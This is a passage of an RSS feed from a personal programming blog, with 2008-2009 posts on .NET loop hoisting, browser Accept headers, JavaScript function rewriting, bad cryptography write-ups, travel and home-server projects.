<p>The most important thing is that it's your job to keep your stuff secure - not anyone else.  If it was their responsibility - it'd be their stuff.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-love_hate_sql.html</guid>
		<title>i have a love/hate affair with sql</title>
		<pubDate>10 Dec 2009 14:15:23 EST</pubDate>
		<description><![CDATA[
<p>It's so much fun to <a href="http://twitpic.com/qo1qc">optimize</a> but it's neither <a href="http://en.wikipedia.org/wiki/Deterministic_algorithm">deterministic</a> nor <a href="http://en.wikipedia.org/wiki/Noncontradiction">logical</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-updated_travel.html</guid>
		<title>updated travel page</title>
		<pubDate>7 Dec 2009 00:15:23 EST</pubDate>
		<description><![CDATA[
<p>I updated the <a class="themainlink" href="travel.html">travel page</a> with some GPS coordinates of my move down to Buenos Aires.  I successfully navigated security with <a href="http://twitpic.com/r8il4">a ton of hardware in my carry-on</a> as well as one duffel with <em>three LCD Monitors</em> and another duffel with <em>an entire desktop computer</em>.  TSA checked both bags and I got my carry-on searched twice in Mexico (but <strong>not in the US!</strong>) but none of it was damaged more than cosmetically, so huge win.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-comparing_loop_hoisting.html</guid>
		<title>comparing loop hoisting in .net</title>
		<pubDate>8 Nov 2009 1:24:23 EST</pubDate>
		<description><![CDATA[
<p>During the same WAN Party that I built <a href="http://howdyougetthatscar.com">howdyougetthatscar.com</a> I also got into an argument with <a href="http://www.bristowe.com/">John Bristowe</a> and <a href="http://haacked.com/">Phil Haack</a> about, in succession, the foreach loop, IEnumerable, yield return, and then LINQ - and my mostly-unjustified hatred for all of them.  Especially the foreach loop.  I really hate that thing.</p>

<p>Anyway, I didn't exactly justify myself well on these topics, so my plan this weekend was to write a long blog post explaining and proving that the foreach loop is to efficiency what the goto is to programmer sanity.  But somehow I got sidetracked, and before I knew it I was actually using the extremely frightening WinDbg - something I had only seen the likes of <a href="http://mcfunley.com/">crazy haskell programmers</a> using.
</p>

<p><img src="resources/loophoisting/windbg.png" alt="WinDbg intimidating me." /></p>

<p>The result of this epic sidetrack was somehow that I ended up comparing loop hoisting.</p>
<pre>for(i=0; i&lt;collection.Count; i++) 
    vs 
int c=collection.Count; 
for(i=0; i&lt;c; i++)</pre>
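
<p>The same two shapes, sketched in Python rather than C# (an illustrative stand-in - the actual adventure is about what the .NET compiler and JIT do with these):</p>

```python
collection = list(range(1000))

def unhoisted():
    total = 0
    i = 0
    while i < len(collection):   # length re-evaluated every iteration
        total += collection[i]
        i += 1
    return total

def hoisted():
    total = 0
    c = len(collection)          # length looked up once, up front
    i = 0
    while i < c:
        total += collection[i]
        i += 1
    return total
```

Both return the same sum; running each under `timeit` tells you whether the hoist actually buys anything in your runtime - which is exactly the question for the C# version.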

<p>So if you want to take an adventure through IL all the way down to the Assembly, and find out which one is <em>actually more efficient</em> <a class="themainlink" href="code_adventures_clr2.html">follow me down the rabbit hole</a>.  The answer will surprise you.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-howdyougetthatscar.html</guid>
		<title>how'd you get that scar?</title>
		<pubDate>5 Nov 2009 10:24:23 EST</pubDate>
		<description><![CDATA[
<p>Have you ever had to explain a random scar?  And the real story isn't very good, so you need something better?  <a href="http://howdyougetthatscar.com/" class="themainlink">There's a webapp for that</a>.  You're welcome internet.</p>

<p>I still need to add more words.  And just for kicks I did it on a ridiculous framework, instead of a 5 line PHP file.  I did it in ASP.Net MVC on Mono on my gentoo server.  So three cheers for over-engineering.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-not_sleeping_is_dangerous_for_your_laptop.html</guid>
		<title>not sleeping can be dangerous for your laptop</title>
		<pubDate>1 Nov 2009 10:37:23 EST</pubDate>
		<description><![CDATA[
<p>In a spurt of productivity, last night when I got home I decided that instead of sleeping, I was finally going to pave my laptop and install Windows 7.  There's just one problem.  My laptop is a netbook, and has no DVD drive.  And after a couple hours of messing with a USB Key, I learned I can't get it to boot from a USB Key.  It's probably the key, although it works fine on my desktop, but I got frustrated and decided to just install 7 from inside XP.  Now I'm going to fast forward a bit and just tell you where I'm at now, not how I got there.</p>

<p><strong>I am quad booting a netbook, by accident</strong>
  <ul>
	<li>Windows 7</li>
	<li>Windows XP</li>
	<li>Ubuntu 9.10</li>
	<li>LiveCD of Backtrack 4 Pre-Release</li>
   </ul>
</p>

<p>Yes, it is a LiveCD, not an install, it reverts every time I restart, and only takes up a gig of space.  It's a pretty novel idea, but it wasn't at all what I wanted.  And on top of that, I still have two big blocks of unpartitioned space that I can't combine or move around.</p>

<p>And the worst part of this is that <em>nothing works right</em>.  I can't get Windows 7 to let NetworkStumbler or Wireshark use my wireless connection, I can't get Ubuntu or Backtrack to even <em>see</em> my wireless connection, and they certainly don't enable the touchscreen (although 7 does).  The only operating system that actually works completely is the old one - XP.  I can't move the partitions around.  Frankly, <em>I don't even know where or how Ubuntu installed itself!</em>  It seriously does not have its own partition - according to what I can see, I <em>think</em> it installed itself inside of a disk container sitting on the ntfs filesystem of my XP partition and is coexisting somehow but that is <em>madness</em>!  And most frustratingly <strong>I can't repave the machine cause I can't get it to boot from an outside source!</strong>  I may try and use linux to overwrite the partition table and install a bootloader with images of the install dvds sitting in random spots of the hard drive, but that seems very careless and fraught with peril.</p>

<p>On the other hand - I <strong>really really really really want someone to confiscate my netbook and try doing forensics on it</strong> cause I would laugh for a long time when they image it and start trying to figure out just what the heck is going on!</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-break_the_internet_follow_standards.html</guid>
		<title>How to break the internet: Follow Standards</title>
		<pubDate>29 Oct 2009 11:07:23 EST</pubDate>
		<description><![CDATA[
<p>This probably isn't news to anyone, but the only reason society functions is because people break the rules.  If everyone followed all the rules, we'd <a href="http://www.kare11.com/news/news_article.aspx?storyid=124420">always be stuck in traffic</a>.  Oh and the internet would break.</p>

<p>I'm not even talking about boring stuff like writing CSS how it's supposed to be written - I'm talking about instead of sending a browser the HTML page, how about sending it what it actually requests.  You know, a <strong>ClickOnce App</strong>.  You see, there's the concept of an <a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html">Accept Header</a> that a browser sends, that's supposed to control what the webserver sends you in response.  If you ask for HTML, it sends HTML, if you ask for XML, it sends XML, if you ask for JSON - json.  Seems reasonable right?  It's all <a href="http://en.wikipedia.org/wiki/Representational_State_Transfer">REST-y</a> and full of best practices warm fuzzy goodness.  You almost want to cuddle up with it it's so happy-feely.  Except if anyone actually obeyed it everything would break.</p>

<p>You see, Windows provides a way to hook into the Accept Header that IE sends, and as Raymond Chen is so apt to point out - if you give developers a way to do something, they're gonna abuse it.  So, if you happen to run Internet Explorer (with Office installed), this is what your browser is sending:</p>

<pre>
  GET /web/index.html HTTP/1.1
  Host: RecessFramework.org
  Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
        application/vnd.ms-xpsdocument, application/xaml+xml,
        application/x-ms-xbap, application/x-shockwave-flash,
        application/x-silverlight-2-b2, application/x-silverlight,
        application/vnd.ms-excel, application/vnd.ms-powerpoint,
        application/msword, */*
</pre>

<p>So you're requesting, in order, a gif, a jpeg, a <acronym title="progressive jpeg">pjpeg</acronym>, and then a <strong>ClickOnce App</strong>.  And then a bunch of other Office apps and shit.</p>
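
<p>To make the failure concrete, here's a toy Python sketch of what a server that <em>did</em> honor the header would do (simplified - real negotiation also weighs q-values, and the media types here are made up for illustration):</p>

```python
def negotiate(accept_header, supported):
    """Return the first client-listed media type the server supports."""
    for item in accept_header.split(','):
        media_type = item.split(';')[0].strip()  # drop any ;q= parameters
        if media_type == '*/*':
            return supported[0]  # wildcard: serve whatever we like best
        if media_type in supported:
            return media_type
    return None

ie_accept = "image/gif, image/jpeg, application/x-ms-application, */*"
print(negotiate(ie_accept, ["text/html"]))
# → text/html (matched only via the trailing */* - a server that could
#   serve a ClickOnce App would literally have to send one first)
```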

<p>Now you can imagine just how quickly someone would get fired at Google, CNN, or Yahoo for deciding to actually honor IE's request. Good thing everyone ignores the Accept Header huh? (On the other hand, it's yet another way to identify IE users independent of User Agent...)</p>

<p>For more details on the header, what different browsers send, and some responses from the IE and Webkit teams, check out Kris Jordan's excellent post <a href="http://www.newmediacampaigns.com/page/browser-rest-http-accept-headers">Unacceptable Browser HTTP Accept Headers (Yes, You Safari and Internet Explorer)</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-being_prepared.html</guid>
		<title>being prepared</title>
		<pubDate>14 Oct 2009 11:55:23 EST</pubDate>
		<description><![CDATA[
<p>It's rare for me to write an essay, as opposed to code, but this is something I've been thinking about recently.  Someone's been ribbing me about "being prepared" - partially because I happen to be an Eagle Scout, but partially because I also happen to always be prepared.  I suppose I do fit the superficial model of being prepared.  I carry a pocketknife on me, I have a change of clothes in my trunk, I keep emergency cash handy, I try not to let my gas tank get too empty, and so on.  But as I've grown older, I've discovered there are three parts to "being prepared".</p>

<p>First and foremost is <strong>what you have</strong>.  It's the easiest, it's the most superficial.  If you're going camping and you're not bringing duct tape - you're not prepared.  Same with a first aid kit, cleaning supplies, or a tent.  This is what most people think of when they hear "that guy is prepared".  They hear "that guy has a lot of crap".  And it's handy, don't get me wrong.  It can get you out of jams - once I landed in Madrid, completely alone, and discovered that when they say the Mastercard would "work everywhere" what they meant was "it'll work anywhere it's accepted" - which was nowhere in Spain or France.  Lucky I had a hundred USD to change and get a metro ride into the city where I could get to a bank.  Here's the thing though - <strong>it's not important</strong>.  At least, not compared to the other ones.  </p>

<p>The next part of being prepared is <strong>what you know</strong>.  If you've got a snakebite kit and no idea how to use it, but you saw on TV that some guy made hash marks with a knife and sucked out the venom - congrats you're a detriment to your friend's life.  You need to know <strong>what to do and how to do it</strong> when you find yourself in an emergency.  Whether it's first aid because someone just cut their artery on a kitchen knife, or you're getting mugged in a foreign city.  Here's an example of not knowing what to do.  My car broke down - the engine overheated.  A guy stops, and drops off two gallons of water - then he takes off.  I have a gallon of coolant in my trunk (that's right, I had everything I needed).  And what did I do?  I fake-remembered that water cools better than coolant, so I dumped the water in the radiator, and started driving.  I didn't get too far - I just boiled off all the water.  Coolant has a higher boiling point than water.  That's why you mix them.  <em>I had everything I needed to accomplish my goal, but I failed because I didn't know what to do</em>.  </p>

<p>The last part of being prepared is the most subtle.  You have to <strong>keep yourself together under pressure</strong>.  This is often what people consider manliness to be - keeping a rational head in the midst of a crisis and delaying your emotional reaction so others can rely on you.  If you have a T-Shirt and you know to apply pressure and keep the wound elevated, but you can't hold it together at the sight of a lot of blood - you're not helping anyone.  Or closer to home - your car just broke down.  In 5mph bumper-to-bumper traffic, no shoulder, as a lane is merging in from the right, in a tunnel.  <em>What do you do?</em>  I've been there.  And I'm not going to say I handled myself flawlessly.  I snapped at my friend that I was doing the best I damn well could.  But I survived, and it could have been a whole lot worse if I didn't hold myself together as well as I did. </p>

<p>So here's the thing guys (and gals).  Being prepared is an admirable quality and don't let anyone tell you differently.  But it's more than how much crap you have in your pockets.  So start easy - take the baby steps.  Put a first aid kit in your car, an extra twenty behind your mom's photo, and a roll of duct tape in your camping supplies.  Now, go take a CPR class, ask your EMT friend how to treat a half-severed finger or a cut vein or artery.  Then practice it, remember it, and refresh your memory until it's more than memory - it's a reaction.  They don't call it muscle memory for nothing.  Finally, here's the hardest thing to do: <strong>push your comfort zone</strong>.  Do things that make you nervous; whether it's ordering at that fast-paced no-nonsense deli or navigating a new city by yourself.  <strong>Build up your confidence</strong>.  Then when you get into a jam - just stop, breathe, and remember, you've handled lots of other difficult things and you can handle this.  That way the next time your car breaks down - you won't.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-javascript_hackery.html</guid>
		<title>super cool javascript hackery</title>
		<pubDate>11 Oct 2009 11:08:23 EST</pubDate>
		<description><![CDATA[
<p>This is a post I've had in the works for months now.  It's about modifying javascript functions on the fly.  I know, that's old hat, you can replace the function to do whatever.  That's not what I'm talking about.  I'm talking about <strong>modifying the function in place to do something slightly different... using string manipulation</strong>.  I know, horrible idea, ridiculous maintenance, tons of regressions.  I'm not advocating its use - I'm saying it's damn cool.  And what's more, javascript is the <em>only language</em> you can do it in (that I've heard of or seen).  <a class="themainlink" href="code_adventures_funjavascript.html">So check it out, and decry my abuse of the language</a> and see how I show you that you <em>can't</em> do it in Lisp.  Really.</p>
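<p>For a taste of the trick (a sketch of my own, not the adventure's exact code): decompile the function with toString(), edit the source as a string, and eval it back into place.</p>

```javascript
// Modify a live function in place: decompile it with toString(),
// string-replace part of its source, and eval the result back.
function greet(name) {
  return 'Hello, ' + name + '!';
}

function patch(fn, find, replace) {
  const src = fn.toString().replace(find, replace);
  return eval('(' + src + ')'); // re-parse the edited source text
}

greet = patch(greet, "'Hello, '", "'Goodbye, '");
greet('world'); // → 'Goodbye, world!'
```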
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-server_config_published.html</guid>
		<title>server configuration published</title>
		<pubDate>16 Sep 2009 9:21:23 EST</pubDate>
		<description><![CDATA[
<p>I run a gentoo server as my router.  It acts as a firewall, router, DNS and DHCP server, a media server, backup, and does some other useful stuff, like segmenting random strangers using my wireless from my computers - helps prevent worms. Something I've been working on for a little bit is getting all the scripts I use to run it published.  I've finally finished.  So at <a href="http://ritter.vg/server/index.rb" class="themainlink">this link</a> you can find an explanation of how things work, all the scripts, and some of the more complicated config files.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-crypo_biz_followup.html</guid>
		<title>crypo.biz followup</title>
		<pubDate>15 Aug 2009 14:20:23 EST</pubDate>
		<description><![CDATA[
<p>After I posted my <a href="code_adventures_badcrypto2.html">last article about crypo.biz and their "military-grade encryption algorithm"</a> I got an e-mail from the author of the site and code.  I called him out on his code, and he called me out - sending me a giant encrypted message and challenging me to break it.  Fair's fair, <a href="code_adventures_badcrypto2_followup.html" class="themainlink">now I have to put my money where my mouth is</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-people_who_shouldnt_do_crypto_part_2.html</guid>
		<title>people who shouldn't do crypto, doing crypto PART 2!</title>
		<pubDate>08 Aug 2009 00:12:23 EST</pubDate>
		<description><![CDATA[
<p>I didn't really think this would turn into a series, but part 2 has arrived!  <a href="http://crypo.biz/">crypo.biz</a> is a site boasting <strong>Military Grade 1280-bit Encryption Algorithm</strong>.  Now that your bullshit detector has gone off, you can read about their <a class="themainlink" href="code_adventures_badcrypto2.html">shoddy algorithm and see the reverse-engineered code</a>.  I wanted to build a cracker for it, but I spent a while getting back into C, and decided I shouldn't spend much more time on this project, so I <a href="http://www.reddit.com/r/crypto/comments/98npq/military_grade_1280bit_encryption_algorithm/">submitted it to reddit</a> for others to look at.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-travel_page_up.html</guid>
		<title>finally put up a travel page</title>
		<pubDate>15 Jun 2009 00:02:23 EST</pubDate>
		<description><![CDATA[
<p>So there's a million things I could have done and I didn't really do any of them - but I finally put up the <a class="themainlink" href="travel.html">travel page</a> with some actual content.  It's just a google map with some trip lines drawn and cities pinned.  No info-windows, no stories, nothing too revolutionary.  If you want to hear the gory, sexy, gritty details - buy me a drink.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-people_who_shouldnt_do_crypto_part_1.html</guid>
		<title>people who shouldn't do crypto, doing crypto</title>
		<pubDate>16 May 2009 22:12:15 EST</pubDate>
		<description><![CDATA[
<p>Does this disqualify me from <a href="http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/">no more free bugs</a>?  I found a pretty horrific security vulnerability in a website not to be named, and reported it.  It was silly-easy to exploit, there was no particular cleverness on my end.  I've put up <a class="themainlink" href="code_adventures_badcrypto1.html">a new code adventure about it</a>.  Suffice to say I could have done an awful lot of incredibly dangerous (and lucrative!) theft, and if I did it wrong I would have gone to jail for a longish time.  When I found it, and successfully exploited it, I sat back, and remembered something Richard Feynman said in one of his books.</p>

<blockquote>I went on and checked some things, which fit, and new things fit, new things fit, and I was very excited.  It was the first time, and the only time, in my career that I knew a law of nature that nobody else knew.  The other things I had done before were to take somebody else's theory and improve the method of calculating</blockquote>

<p>So this was the first time (so far) that I knew some incredible zero-day that no one else knew.  And I rushed out to explain it to my roommate and I was excited.  So read about it, and then you'll think, well, that's <em>obvious</em> and of course it is.  But out of the thousands and thousands who could have found it and exploited it - I did it.  </p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-reading_list.html</guid>
		<title>reading list</title>
		<pubDate>11 May 2009 22:12:00 EST</pubDate>
		<description><![CDATA[
<p>this must be house-cleaning time, because in addition to my bucketlist, I've also published my <a class="themainlink" href="readinglist.html">RSS reading list</a> in OPML format.  It's easy enough to read that you can skim it, or if you're super-hardcore you can import the whole thing and weed out the lists you don't like!</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-bucket_list.html</guid>
		<title>the bucket list</title>
		<pubDate>7 May 2009 21:01:00 EST</pubDate>
		<description><![CDATA[
<p>I've finally gotten around to publishing a list I wrote up for <a href="http://boldlygosolo.typepad.com/">Boldly Go Solo</a> after they published an <a href="http://boldlygosolo.typepad.com/boldly_go_solo/2009/04/highadrenaline-adventures-for-daring-solo-travelers.html">off-the-cuff</a> list of extreme items.  I suspect it will be published there soon, but I wanted to clear out my queue and put something new on the blog.  So without further ado, check out my list of <a href="thelist.html" class="themainlink">over a hundred extreme sports, events, destinations, and things to do before you die</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-hacking_net_clr_part_1.html</guid>
		<title>hacking .net's clr</title>
		<pubDate>26 Apr 2009 13:08:00 EST</pubDate>
		<description><![CDATA[
<p>After <a href="http://www.devscovery.com/">Devscovery</a> I've been trying to decipher the magic behind .Net lately, reading the beginning chapters of CLR via C# and playing around.  Well I'm not quite sure what prompted me to do this, but I ended up looking into the binary of the assemblies produced by a simple Hello World program.  I diffed the assemblies between two runs on the same machine, between two runs on different machines, and between Debug and Release mode.  Most of it wasn't too surprising, I think the biggest surprise was in just how much I was able to figure out.  If I knew PE Headers as well as some people I'd have deciphered even more.  If you have a demented mind like mine, you can read the article and enjoy the hex: <a class="themainlink" href="code_adventures_clr1.html">hacking the clr: diffing assemblies</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-rss_feed.html</guid>
		<title>rss feed!</title>
		<pubDate>19 Apr 2009 14:29:00 EST</pubDate>
		<description><![CDATA[
<p>I am no longer a hypocrite.  I implemented an RSS feed for the site.  It was a little tricky, considering I don't use a database or anything of the sort, but it works (I think).  I outlined how I did it in an update of my <a class="themainlink" href="code_adventures_site.html#rev4">code adventures - making the site</a> post.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-authentication_poc.html</guid>
		<title>authentication poc</title>
		<pubDate>07 Apr 2009 16:29:00 EST</pubDate>
		<description><![CDATA[
<p>I added a new <a class="themainlink" href="code_poc.html">Proof of Concept</a> - this one on an authentication idea I had for lost passwords.  Secret Questions suck, picking your own secret question sucks.  Filling out a form of 100 items really sucks.  Picking a few questions to answer out of 100 questions sucks because you have to read them all.  But if we organize the questions in a way that they're very easy to "skim" we can present the user or attacker with 100 choices of questions to answer.</p>  
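<p>To illustrate what I mean by "skim" (hypothetical questions and grouping of my own here - the PoC has the real scheme): if every question leads with a category word, you can skim for the handful of categories that apply to you instead of reading all 100.</p>

```javascript
// A flat list of 100 questions is unreadable; grouped by a leading
// category word, it can be skimmed instead of read.
const questions = [
  'Childhood: name of your first pet?',
  'Childhood: street you grew up on?',
  'Travel: first country you visited?',
  'Cars: make of your first car?',
];

function groupByCategory(list) {
  const groups = {};
  for (const q of list) {
    const idx = q.indexOf(': ');
    const category = q.slice(0, idx);
    (groups[category] = groups[category] || []).push(q.slice(idx + 2));
  }
  return groups;
}

groupByCategory(questions);
// e.g. { Childhood: [...], Travel: [...], Cars: [...] }
```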

<p>I also changed around some styles to try and make the site more readable.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-rfid_reader.html</guid>
		<title>rfid reader</title>
		<pubDate>04 Apr 2009 16:17:00 EST</pubDate>
		<description><![CDATA[
<p>This is what I really worked on two weeks ago.  I wired up an RFID Reader to a bowl of candy and had the router freak out whenever someone took a piece.  Read about it in Code Adventures: <a href="code_adventures_rfid.html" class="themainlink">RFID Experimentation</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-small_site_tweaks.html</guid>
		<title>code update</title>
		<pubDate>22 Mar 2009 12:42 EST</pubDate>
		<description><![CDATA[
<p>I updated the site just a tad.  Some CSS tweaks on the menu (it will now stay fixed as you scroll) and a javascript tweak I detailed in the appropriate <a class="themainlink" href="code_adventures_site.html">adventure</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-webhooks_i_was_doing_it_all_along.html</guid>
		<title>right... I was doing that all along!</title>
		<pubDate>11 Feb 2009 13:34 EST</pubDate>
		<description><![CDATA[
<p>If you've seen my <a href="code_adventures_backup.html">Bastardizing a Backup</a> Adventure in Code, I should note that there's this really cool thing called <a href="http://timothyfitz.wordpress.com/2009/02/09/what-webhooks-are-and-why-you-should-care/">webhooks</a> that work like that.  And they're actually pretty useful, and awesome, and I <em>totally</em> was following that model when I came up with my crazy ass idea.  Yea.  Totally.</p>

<p>Seriously though, it's always enjoyable when you discover that some idea you came up with independently is an actual useful item.  It's usually fleshed out a little bit better, and you rarely have the idea first, but it's cool.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-why_i_hate_perl.html</guid>
		<title>why I hate perl</title>
		<pubDate>18 Jan 2009 12:36 EST</pubDate>
		<description><![CDATA[
<p>Just so you know guys, this is why everyone who does know how to program well in some other language hates perl.</p>

<pre>if(false){
print "Seriously.  What the fuck.";
}</pre>

<p>I bet there's some semi-logical reason, once you know gobs of perl, why this would possibly make sense.  But for <strong>everyone else</strong> it cannot make any sense at all. And there are dozens of similar little things that prevent you from writing more than 5 lines at a time without testing them to make sure they do exactly what you think they should do.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-project_upstreamed.html</guid>
		<title>i got project upstream-ed</title>
		<pubDate>06 Jan 2009 12:17 EST</pubDate>
		<description><![CDATA[
<p><a href="http://project-upstream.awardspace.com/">Project Upstream</a> is a social network experiment that randomly connects two people via an AIM connection.  <a href="http://innerworkingsofaspacecase.blogspot.com/2008/07/project-upstream.html">Here's a better description</a>.  Suffice to say I tweeted at work, and got Project Upstream-ed.  I googled the screenname immediately to figure out what was going on, found a list, and then read about the project.</p>
<blockquote>
Session Start (MyScreenname:accusatorycoho): Tue Jan 06 11:58:26 2009<br />
[11:58] accusatorycoho: I hope your day is wonderfully amazing, just like you!<br />
[12:01] accusatorycoho: eh?<br />
[12:01] MyScreenname: yea - happened to me too.  it's a social networking experiment.  i didn't actually send you the IM<br />
[12:02] MyScreenname: look here: http://innerworkingsofaspacecase.blogspot.com/2008/07/project-upstream.html<br />
[12:02] MyScreenname: and i'm not sure what screenname you see; but it isn't mine.  (neither of us has any idea who the other is)<br />
[12:02] accusatorycoho: okay, and?<br />
[12:03] MyScreenname: and nothing.  they expect us to chat or something.  i dunnoe.  <br />
[12:03] accusatorycoho: oh, weird.<br />
[12:04] MyScreenname: it's an interesting concept; but i'm at work so i can't really chat. <br />
[12:04] MyScreenname: have a nice day though<br />
[12:04] accusatorycoho: you as well.<br />
[12:04] accusatorycoho: later</blockquote>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-man_in_the_middle_in_the_wild.html</guid>
		<title>man in the middle attack</title>
		<pubDate>2 Jan 2009 23:17 EST</pubDate>
		<description><![CDATA[
<p>Two updates in one day?!  Crazy!  Anyway, I thought this was too interesting not to post.  <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=460374">Here's a man-in-the-middle attack</a> out in the wild.  The person actually thought it was a Firefox bug, because of all the invalid SSL certificates they got.  After some investigating - yup, she was getting haxxed.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-fastest_data_transfer_protocol.html</guid>
		<title>fastest data transfer protocol</title>
		<pubDate>2 Jan 2009 13:48 EST</pubDate>
		<description><![CDATA[
<p>In case you were wondering, I started comparing the transfer speeds of different protocols.  I stopped after three.  The data was being transferred onto a RAID-6.  Results:</p>
<table style="margin-left:auto;margin-right:auto;" border="1">
  <tr>
    <th>Method</th>
    <th>Bytes</th>
    <th>Time</th>
    <th>Speed</th>
  </tr>
  <tr>
    <td>smb mount then cp</td>
    <td>733960192</td>
    <td>425</td>
    <td>1.647 MB/s</td>
  </tr>
  <tr>
    <td>scp</td>
    <td>730253312</td>
    <td>69.48*</td>
    <td>10.0241 MB/s</td>
  </tr>
  <tr>
    <td>wget using http</td>
    <td>736274432</td>
    <td>63.2</td>
    <td>11.1097 MB/s</td>
  </tr>
</table>
<p>There are two items to note here:
  <ol>
    <li>scp includes the time it took me to type in my 40+ character password.  Subtract out at least 3-4 seconds.</li>
    <li>scp and wget actually locked up my network connection.  putty timed out.  top indicated that an entire core was dedicated to the copy.</li>
  </ol>
</p>
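<p>For the curious, the speed column is just bytes divided by seconds, with a MB taken as 2^20 bytes - easy to recompute:</p>

```javascript
// Recompute the table's speed column: bytes / seconds / 2^20.
const runs = [
  { method: 'smb mount then cp', bytes: 733960192, seconds: 425 },
  { method: 'scp', bytes: 730253312, seconds: 69.48 },
  { method: 'wget using http', bytes: 736274432, seconds: 63.2 },
];
const MB = 1024 * 1024;
for (const r of runs) {
  console.log(r.method + ': ' + (r.bytes / r.seconds / MB).toFixed(3) + ' MB/s');
}
```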
<p>So there you go - if you need to transfer several hundred gigabytes, use scp.</p>
<p><strong>Update (1/3/2009):</strong> Having desired the comparison facilities of rsync, I can add that rsync over ssh compares favorably, and is in the same neighborhood as straight scp.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-bastardizing_a_backup.html</guid>
		<title>adventure in code added</title>
		<pubDate>2 Nov 2008 16:11 EST</pubDate>
		<description><![CDATA[
<p>A horrible experiment gone wrong from last weekend has been immortalized on the new <a class="themainlink" href="code_adventures_backup.html">adventures in code</a> section.  I'm hoping people won't read it and judge me harshly - I posted it as a joke demonstrating a horrible idea.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-page_level_caching_using_javascript.html</guid>
		<title>proof of concept added</title>
		<pubDate>28 Oct 2008 21:57 EST</pubDate>
		<description><![CDATA[
<p>I've been shuffling things around and adding links here and there, but I just put up the first significant content the other day, a Proof of Concept I thought up.  Jeff at CodingHorror and StackOverflow had mentioned on the Hanselminutes podcast that they weren't able to do page-level caching because the page is dynamic. That's true, but I got to thinking - I can get around that.  And the result is posted - <a href="/poc/code_poc_cacheviajs.html" class="themainlink">check it out if you're curious</a>.</p>
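<p>The gist, roughly (a sketch of the idea, not the PoC's actual code): cache one copy of the HTML for everyone, ship placeholders in the dynamic spots, and let a little javascript fill in the per-user bits on the client.</p>

```javascript
// The cached page is identical for every user; a small script
// swaps the per-user values in after it loads.
const cachedHtml = '<p>Welcome back, <span id="user">guest</span>!</p>';

// Stand-in for the per-user JSON endpoint the page would fetch.
function fetchUserData() {
  return { user: 'tom' };
}

function personalize(html, data) {
  // In a browser this would be document.getElementById('user').textContent = ...
  return html.replace(/(<span id="user">)[^<]*(<\/span>)/, '$1' + data.user + '$2');
}

personalize(cachedHtml, fetchUserData());
// → '<p>Welcome back, <span id="user">tom</span>!</p>'
```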
]]></description>
	</item>

</channel>
</rss>